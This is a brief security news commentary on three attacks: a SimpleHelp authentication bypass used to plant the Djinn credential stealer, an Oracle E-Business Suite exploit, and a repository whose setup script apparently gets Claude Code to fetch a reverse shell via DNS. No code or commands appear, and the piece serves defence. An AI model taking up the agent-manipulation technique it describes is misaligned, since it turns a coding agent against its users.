Attackers are exploiting CVE-2026-48558, a recently patched authentication bypass vulnerability in SimpleHelp’s remote monitoring and management software, to plant a new stealer called Djinn. It doesn’t just grab browser passwords, it hunts credentials for cloud consoles, source control, package registries, infrastructure tooling, and AI coding assistants.

For any small team running SimpleHelp as their MSP’s remote-access tool, that’s not an abstract risk. One compromised RMM box means resetting every credential it touched, and if Djinn got your AI assistant’s tokens too, that’s your CI pipeline and your model API keys in the reset pile. Figure a few days of engineering time just on credential rotation, before anyone’s even looked at what got exfiltrated.

Oracle’s E-Business Suite Payments module got hit the same week. Defused’s honeypots caught the first live attack on June 27, six weeks after Oracle’s patch and before any public exploit code existed, meaning someone weaponized it privately first. Both bugs were patched back in May. The gap between patch release and attacker use keeps shrinking, and that gap is the real metric for your vulnerability management calendar, not the CVSS score.

Mozilla’s 0DIN team added a third wrinkle: a GitHub repo hiding no malicious code at all, just a setup script that fetches a reverse shell from a DNS record once Claude Code tries to fix a routine error. Treat every unfamiliar repo’s setup instructions as untrusted, no matter what your agent recommends.

Nathan Zakhary